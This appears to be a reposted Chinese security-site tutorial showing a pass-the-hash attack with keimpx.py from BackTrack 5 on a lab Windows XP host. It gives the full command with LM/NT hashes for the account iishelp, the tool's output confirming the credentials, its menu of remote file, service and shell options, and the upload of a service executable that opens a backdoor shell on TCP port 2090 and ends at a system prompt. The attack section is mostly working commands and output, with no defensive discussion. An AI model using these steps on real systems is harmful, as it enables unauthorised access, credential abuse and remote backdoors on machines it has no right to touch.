热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

bt5下的keimpx.py进行hash注入

发布时间:2012-02-15 19:08文章来源:网络文章作者:秩名 点击次数:
摘要:测试目标机器是winxp,ip:192.168.1.5。由于不是域机器,所以事先我关闭了防火墙和使用简单文件共享(打开我的文档-工具-文件夹选项-查看-去掉使用简单文件共享前的)。 运行命令: root@bt:/pentest/passwords/keimpx# ./keimpx.py -t 192.168.1.5 -v 1 -p...

测试目标机器是winxp,ip:192.168.1.5。由于不是域机器,所以事先我关闭了防火墙和使用简单文件共享(打开我的文档->工具->文件夹选项->查看->去掉使用简单文件共享前的√)。

运行命令:

root@bt:/pentest/passwords/keimpx# ./keimpx.py -t 192.168.1.5 -v 1 -p 445 -U iishelp --nt=ccf9155e3e7db453aad3b435b51404ee --lm=3dbde697d71690a769204beb12283678

回显(其中以下的红字是让你选择的和我输的命令):

This product includes software developed by CORE Security Technologies

(http://www.coresecurity.com), Python Impacket library


keimpx 0.2

by Bernardo Damele A. G. <bernardo.damele@gmail.com>


[13:46:20] [INFO] Loading targets

[13:46:20] [INFO] Loading credentials

[13:46:20] [INFO] Loading domains

[13:46:20] [INFO] Loaded 1 unique targets

[13:46:20] [INFO] Loaded 1 unique credentials

[13:46:20] [INFO] No domains specified, using NULL domain

[13:46:20] [INFO] Attacking host 192.168.1.5:445

[13:46:20] [INFO] Valid credentials on 192.168.1.5:445: iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee

[13:46:20] [INFO] Attack on host 192.168.1.5:445 finished

The credentials worked in total 1 times

TARGET SORTED RESULTS:


192.168.1.5:445

iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee


USER SORTED RESULTS:


iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee

192.168.1.5:445

Do you want to get a shell from any of the targets? [Y/n]

Which target do you want to connect to?

[1] 192.168.1.5:445

> 1

Which credentials do you want to use to connect?

[1] iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee

> 1

[13:46:35] [INFO] type 'help' for help menu

# help

Generic options

===============

help - show this message

verbosity {level} - set verbosity level (0-2)

info - list system information

exit - terminates the SMB session and exit from the tool


Shares options

==============

shares - list available shares

use {sharename} - connect to an specific share

cd {path} - changes the current directory to {path}

pwd - shows current remote directory

ls {path} - lists all the files in the current directory

cat {file} - display content of the selected file

download {filename} - downloads the filename from the current path

upload {filename} - uploads the filename into the current path

mkdir {dirname} - creates the directory under the current path

rm {file} - removes the selected file

rmdir {dirname} - removes the directory under the current path



Services options

================

deploy {service name} {local file} [service args] - deploy remotely a service executable

undeploy {service name} {remote file} - undeploy remotely a service executable



Shell options

=============

shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp



Users options

=============

users [domain] - list users, optionally for a specific domain

pswpolicy [domain] - list password policy, optionally for a specific domain

domains - list domains to which the system is part of



Registry options (Soon)

================

regread {registry key} - read a registry key

regwrite {registry key} {registry value} - add a value to a registry key

regdelete {registry key} - delete a registry key



# shell

[13:47:09] [INFO] Uploading the service executable to 'ADMIN$\urakxn.exe'

[13:47:09] [INFO] Connecting to the SVCCTL named pipe

[13:47:09] [INFO] Creating the service 'Ynohkb'

[13:47:09] [INFO] Starting the service 'Ynohkb'

[13:47:09] [INFO] Connecting to backdoor on port 2090, wait..

Microsoft Windows XP [\ufffd\u6c7e 5.1.2600]

(C) \ufffd\ufffd\u0228\ufffd\ufffd\ufffd\ufffd 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

标签分类:

上一篇:利用批处理取得system权限
下一篇:使用Metasploit 进行权限提升